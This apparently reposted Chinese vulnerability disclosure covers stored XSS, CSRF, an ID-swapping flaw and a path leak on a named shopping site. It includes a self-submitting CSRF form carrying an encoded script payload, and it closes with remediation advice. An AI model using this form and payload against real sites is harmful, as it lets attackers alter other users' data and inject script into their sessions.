存储Xss:街道地方
CSRF:
<form action="" method="post">
<input type="test" name="type" value="edit"/>
<input type="test" name="userName" value="wooyun"/>
<input type="test" name="provice" value="%25E5%25AE%2589%25E5%25BE%25BD"/>
<input type="test" name="city" value="%25E5%25B7%25A2%25E6%25B9%2596"/>
<input type="test" name="street" value="%3cscript%3ealert(%2fxss%2f)%3c%2fscript%3e"/>
<input type="test" name="zip" value="529600"/>
<input type="test" name="moblie" value="12345678911"/>
<input type="test" name="tel" value=""/>
<input type="test" name="def" value="true"/>
<input type="test" name="email" value="a13411334452@gmail.com"/>
<input type="test" name="id" value="90383"/>
<script type="text/javascript">
document.forms[0].submit();
</script>
</form>
最后一个严重了跨域修改:
<input type="test" name="id" value="90383"/>
id修改为别人的就中招:
id=90386为我其他一个账号(晴天小铸1)
经过测试可用修改任何id=xxx (我测试范围不超过90386)
商城是外包?
送个爆路径:
app.junph.com/Shopping/OrderDetail.aspx?OrderCode=201207297887999&gotpay=0
ERP.UI.WEB.APP.Shopping.OrderDetail.Page_Load(Object sender, EventArgs e) in F:\jobs\TFS_workspace\TxErp2\TxErp\ERP.UI.WEB.APP\Shopping\OrderDetail.aspx.cs
修复方案:
使用antixss防御xss你们做到了,街道地方被特殊编码过了所以。。。。。
Xss修复:服务端URL编码回来再过滤再编码。
CSRF:token Referer (你们站,没有验证码的地方,基本都有CSRF....)
跨域问题:
你们应该知道的,应该是粗心。
爆路径:最简单的,404页面。
,涛涛
电脑知识网,涛涛电脑知识网